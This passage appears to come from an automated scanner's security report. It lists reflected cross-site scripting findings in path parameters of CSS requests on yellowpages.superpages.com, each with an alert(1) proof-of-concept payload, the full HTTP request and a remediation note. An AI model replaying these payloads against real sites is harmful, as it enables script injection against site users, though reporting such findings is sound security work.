Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssf7342"-alert(1)-"107199becab/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1c09"-alert(1)-"6f31add0046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/forms.cssf1c09"-alert(1)-"6f31add0046 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"96068b15aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common3fdca"-alert(1)-"96068b15aaf/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef7bf"-alert(1)-"eed6ae6e6f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a006a"-alert(1)-"cbff4859ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/print.cssa006a"-alert(1)-"cbff4859ae5 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1ff"-alert(1)-"dc2efa902dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95a34"-alert(1)-"686e302e816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css95a34"-alert(1)-"686e302e816/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aabb"-alert(1)-"23c3bf4d12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/reset.css3aabb"-alert(1)-"23c3bf4d12 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15d"-alert(1)-"4cb99c62a1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c75f4"-alert(1)-"02b021d68ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec1e7"-alert(1)-"03bc909001e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c20"-alert(1)-"e4243f6ac8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8cb3"-alert(1)-"ad160d53bf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fc04"-alert(1)-"230ea56f1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97191"-alert(1)-"a26cfc23980 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3da"-alert(1)-"acb1d78ef25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa201"-alert(1)-"737b17cce6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53209"-alert(1)-"19f62aec85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common53209"-alert(1)-"19f62aec85/css/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c53f7"-alert(1)-"f0b92738dcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6905"-alert(1)-"628f1c95393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4770c"-alert(1)-"4414bf7cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4770c"-alert(1)-"4414bf7cc3/css/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee76"-alert(1)-"0d4decbeb19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssdee76"-alert(1)-"0d4decbeb19/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1738"-alert(1)-"099ed66255a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/structure.cssb1738"-alert(1)-"099ed66255a HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992a6"-alert(1)-"25f8f156e7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common992a6"-alert(1)-"25f8f156e7b/css/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd028"-alert(1)-"da24c435281 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssdd028"-alert(1)-"da24c435281/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e49"-alert(1)-"cece7288702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/styles.css67e49"-alert(1)-"cece7288702 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
